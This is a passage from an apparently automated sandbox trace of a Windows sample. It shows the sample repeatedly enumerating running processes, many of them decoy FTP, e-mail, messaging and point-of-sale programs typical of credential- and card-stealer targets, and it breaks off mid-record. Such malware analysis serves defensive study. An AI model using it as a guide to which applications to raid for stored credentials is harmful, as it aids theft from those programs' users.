lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.723] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.727] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0258.728] CloseHandle (hObject=0x758) returned 1 [0258.728] Sleep (dwMilliseconds=0x64) [0258.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0258.868] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.870] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.884] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.886] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.887] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.889] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.890] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.892] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.893] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.895] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.898] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.899] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.901] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.951] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.013] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.015] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.017] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.019] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.021] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.023] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.032] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.035] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.037] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.039] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.043] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.049] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0259.131] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0259.133] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0259.136] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0259.151] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0259.154] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0259.156] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0259.158] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0259.159] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0259.161] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0259.163] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0259.164] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0259.166] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0259.167] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0259.171] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0259.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0259.174] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0259.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.177] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.223] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.224] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.226] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.228] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.230] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.234] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.236] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.238] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.240] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.242] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.243] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.245] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.251] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.253] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.255] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.257] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.313] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.315] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.317] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.318] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.320] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.322] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.324] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.328] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0259.330] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0259.332] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0259.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0259.335] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 